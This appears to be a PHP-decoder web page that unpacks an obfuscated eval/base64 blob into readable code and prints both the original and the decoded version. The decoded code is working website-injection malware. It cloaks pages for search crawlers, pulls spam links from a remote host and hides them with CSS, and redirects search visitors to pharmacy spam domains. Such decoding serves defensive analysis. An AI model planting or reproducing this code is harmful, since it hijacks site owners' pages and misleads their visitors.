Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
eval(gzinflate(base64_decode("zVh7c+I4Ev8bPoXicsX2BDCZndndC5BUZsLMbtVsskfIPSowLmEE6DCSxxJ5..
Decoded Output download
$client_ip = array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : '';
if(!$client_ip) $client_ip=$_SERVER["REMOTE_ADDR"];
$client_ip = preg_replace('/.*unknown,\s*/', '', $client_ip);
$ip = preg_replace("/\.(\d+)$/", '', $client_ip);
$originalip = $client_ip;
$cdomain="fast-ssl.com";$rdomain="fast-sync.com";
$gt_php="gt.php";
function ouDOBFFgehwnqSagBhbisU($url) {
if (function_exists("curl_init")) {
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $url);
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
$out = curl_exec($c);
curl_close($c);
} else {
$out = "curl not available."; exit;
}
return $out;
}
error_reporting(0);
if(!array_key_exists('HTTP_USER_AGENT', $_SERVER))
$_SERVER['HTTP_USER_AGENT'] = '';
$page=urlencode("http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]);
if(preg_match("/Googlebot|bingbot|Slurp/", $_SERVER["HTTP_USER_AGENT"])) {
if ($_SERVER["QUERY_STRING"]=="q") { print "ok!"; exit; }
$outsourceurl="http://$cdomain/showop.php?page=$page";
$out=ouDOBFFgehwnqSagBhbisU($outsourceurl);
if ($out!="" and $out!="1") {
header('Cache-Control: no-cache, no-store, must-revalidate');
print $out;
exit;
}
$outsourceurl="http://$cdomain/$gt_php?site=".urlencode($_SERVER['HTTP_HOST']).'&page='.urlencode($_SERVER['REQUEST_URI']).'&ip='.urlencode($originalip).'&agent='.urlencode($_SERVER['HTTP_USER_AGENT']);
$links_content = base64_decode(ouDOBFFgehwnqSagBhbisU($outsourceurl));
$originalurl="http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"];
$originalpage = ouDOBFFgehwnqSagBhbisU($originalurl);
if(preg_match("/<a.*?>/is", $originalpage)) {
preg_match_all("/<a.*?>.*?<\/a>/is", $links_content, $matches);
$links = $matches[0];
$comment = '';
if(preg_match("/<!--.*?-->/s", $links_content, $matches))
$comment = $matches[0];
function anchor($data) {
if(!preg_match("/<img/i", $data[2]))
return "<!-- link_".$GLOBALS['i']++." -->".$data[0];
}
srand(crc32($originalurl));
for ($class_name = '', $i = 0, $z = strlen($a = 'abcdefghijklmnopqrstuvwxyz0123456789')-1; $i != 8; $x = rand(0,$z), $class_name .= $a{$x}, $i++);
$GLOBALS['i'] = 0;
$originalpage = preg_replace_callback("/<a(.*?)>(.*?)<\/a>/is", "anchor", $originalpage);
$i = $GLOBALS['i'];
if($i >= count($links)) {
for($k=0;$k<count($links);$k++) {
$links[$k] = preg_replace("/<a/", "<a class='$class_name'", $links[$k]);
$originalpage = preg_replace("/<!-- link_$k -->/s", $links[$k]. ' ', $originalpage );
}
}
else {
$n_links = round(count($links)/$i);
for($k=0;$k<$i;$k++) {
$out_content = '';
for($p=0;$p<$n_links;$p++)
if(($k*$n_links+$p) < count($links)) {
$links[$k*$n_links+$p] = preg_replace("/<a/i", "<a class='$class_name'", $links[$k*$n_links+$p]);
$out_content .= $links[$k*$n_links+$p];
}
$originalpage = preg_replace("/<!-- link_$k -->/s", $out_content. ' ', $originalpage );
}
}
$originalpage = preg_replace("/<!-- link_(\d+) -->/s", '', $originalpage);
$hide_methods = array("display: none", "visibility: hidden", "text-indent:5000px", "position: absolute; left: 7000px; top: 0px", "position:absolute; left:4000px");
$css = $hide_methods[array_rand($hide_methods)];
if(preg_match("/<head/i", $originalpage)) {
$originalpage = preg_replace("/(<head.*?>)/i", "$1$comment
<style>
.$class_name {
$css;
}
</style>", $originalpage);
}
elseif(preg_match("/<html/i", $originalpage)) {
$originalpage = preg_replace("/(<html.*?>)/i", "$1$comment
<style>
.$class_name {
$css;
}
</style>", $originalpage);
}
else
$originalpage = preg_replace("/^/", "$comment<style>
.$class_name {
$css;
}
</style>", $originalpage);
}
else {
if (preg_match('/<body.*?>/i',$originalpage)) {
$originalpage=preg_replace('/href=([\'"]{0,1})http.*?>/i', '>', $originalpage);
$originalpage=preg_replace('/(<body.*?>)/i', "$1$links_content", $originalpage, 1);
}
elseif (preg_match('/<\/body>/i',$originalpage)) {
$originalpage=preg_replace('/href=([\'"]{0,1})http.*?>/i', '>', $originalpage);
$originalpage=preg_replace('/(<\/body>)/i', "$links_content$1", $originalpage, 1);
}
}
header('Cache-Control: no-cache, no-store, must-revalidate');
print $originalpage;
exit;
}
if (preg_match('/live|msn|yahoo|google|ask|aol/', $_SERVER["HTTP_REFERER"]) && !preg_match("/^(000000000000)/", $originalip)) {
$tabs = array ('viagra','cialis','levitra','propecia','prozac','xenical','zoloft','tamiflu','sildenafil','tadalafil','vardenafil','finasteride','hoodia','acomplia');
$niche='unknown';
foreach($tabs as $tab) {
if(preg_match("/$tab/i", $_SERVER["HTTP_REFERER"])) {
$niche = $tab;
}
}
$page = urlencode("http://".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]);
if ($niche!="unknown") {
header('Cache-Control: no-cache, no-store, must-revalidate');
header("Location: http://$rdomain/r.pl?niche=$niche&page=$page&ref=".urlencode($_SERVER["HTTP_REFERER"]));
exit;
}
$tag = $_SERVER["HTTP_HOST"];
if(preg_match("/^www\./", $tag))
$tag = preg_replace( "/^www\.(.*)$/", "$1", $tag);
$tag = substr(strtolower(base64_encode($tag)), 0, 5);
if(preg_match("/$tag/", $_SERVER["REQUEST_URI"])) {
header('Cache-Control: no-cache, no-store, must-revalidate');
header("Location: http://$rdomain/r.pl?niche=nch&page=$page&ref=".urlencode($_SERVER["HTTP_REFERER"]));
exit;
}
}
Did this file decode correctly?
Original Code
eval(gzinflate(base64_decode("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"))) Function Calls
| gzinflate | 1 |
| base64_decode | 1 |
Stats
| MD5 | 237f03e1aa395d3d830f3b4fbbb18673 |
| Eval Count | 1 |
| Decode Time | 117 ms |